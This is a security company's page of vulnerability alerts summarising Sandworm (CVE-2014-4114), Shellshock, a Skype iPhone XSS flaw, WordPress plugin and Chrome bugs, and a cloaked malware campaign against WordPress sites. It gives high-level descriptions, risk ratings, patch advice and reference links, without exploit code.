Vulnerability Alerts

IT Security Vulnerability Alerts provided by Security I Trust

A zero-day vulnerability affecting all Microsoft supported versions of Windows Operating system, including Windows Server has been identified. Also we are seen reports from iSight identifying a cyber espionage campaign already in progress to compromise exposed system

The vulnerability Exploitation is identified by CVE-2014-4114, and also known as Sandworm. It was been reportedly discovered in the wild in connection with a cyber espionage campaign that iSIGHT Partners has attributed to Russia. The zero-day vulnerability is reported as been used in early September  to infect victims with malicious attachments, primarily PowerPoint files. Although the attackers used PowerPoint as its attack vector.

 

The vulnerability exists in the OLE package manager in Microsoft Windows and Server. The OLE packager (packager .dll) is able to download and execute external files like INF, allowing the attacker to execute commands.

 

Risk Level

The Risk level appears high, because if one group could design a worm to exploit the hole, then someone will try to recode the worm and make it wide spread.

Impact – we are only at the early stage of trying to understand what we are looking at. But the if the vulnerability allows the possibility to download and execute a file that the potential impact is extremely High

 

http://www.tripwire.com/state-of-security/incident-detection/microsoft-windows-zero-day-exploit-sandworm-used-in-cyber-espionage-cve-2014-4114/

 

iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign – See more at: http://www.isightpartners.com/2014/10/cve-2014-4114/#sthash.mDSsxZ8j.dpuf

http://www.isightpartners.com/2014/10/cve-2014-4114/

.

 

http://www.theregister.co.uk/2014/10/14/isight_microsoft_announce_windows_and_windows_server_0day/


.

.
Russian Hackers Target EU, NATO

Shellshock bash Code Injection Vulnerability, what do you need to do? what is the Risk?

 

Report from SAMS ISC

 

Bash Code Injection (Shellshock) Vulnerability (CVE 2014-6271)

 

 

Cento OS Bash vulnerability that had been announced in 2014/09/24 How to FIX

 

 

How to fix bash code injection flaw on CentOS/RedHat 6x Server

 

 

HackerKast Shellshock- September 25, 2014 – WhiteHat Security

 

iPhone Skype XSS Vulnerability Lets Hackers Steal Phonebook

iPhone Skype app XSS Vulnerability. Is claimed to allow Hackers to Steal the contnet of your Phonebook. This bug in the latest version of Skype for iPhone and iPod touch makes users vulnerable to having their address book stolen just by viewing a specially crafted message, says AppSec Consulting security researcher Phil Purviance.

 

WordPress WP-DBManager Plugin Vulnerabilities

level: critical

Impact: Cross Site Scripting

Risk: Exposure of system information and Exposure of sensitive information, 

Solution: Vendor Patch

Software: WordPress WP-DBManager Plugin 2.x

Description: Two vulnerabilities have been identified in the WP-DBManager plugin for WordPress (Blog Software), which can be exploited to conduct cross-site attacks, resulting in the disclose sensitive information.

Solution: Update to version 2.62.

Google Chrome suspected of having Multiple Security Vulnerabilities

Affected version: Google Chrome prior to 5.0.375.99

Chrome is susceptible to have multiple security vulnerabilities.

  • 4 of the vulnerabilities potentially have to do with memory corruption, so it is possible that some of them can be used for code execution.
  • 3 of the bugs specifically relate to Chrome's handling of SVG and PNG images, CSS style sheets.
  • The other one is related to Chrome's bidi algorithm. 

Status: vendor confirmed, updates available

References: Vendor Home Page http://www.google.com

Google Chrome Stable Channel Update http://googlechromereleases.blogspot.com/2010/07/stable-channel-update.html

SecurityFocus BID http://www.securityfocus.com/bid/41334/

According to various reports, in the past few days a large number of websites created using WordPress have been hacked. . Unconfirmed reports by WPSecurityLock suggest that other PHP-based management systems, such as the Zen Cart eCommerce solution, have also been targeted.

The hacked web pages appear to have been infected with scripts, which not only install malware on users’ systems, but also prevent browsers like Firefox and Google Chrome, which use Google’s Safe Browsing API, from issuing an alert when users try to access the page. When Google’s search bot encounters such a specially crafted page, the page responds by simply returning harmless code. This camouflage strategy takes advantage of the browser switch normally used by developers to return browser specific code to suit functional variations in different browser, such as Internet Explorer and Firefox.

Experts are currently still puzzled over which hole was actually exploited for the large-scale attack. The only thing that seems certain at this point is that the problem didn’t originate in WordPress, because if this was the case considerably more pages would have been infected. It is still unknown which version of wordpress are been attacked.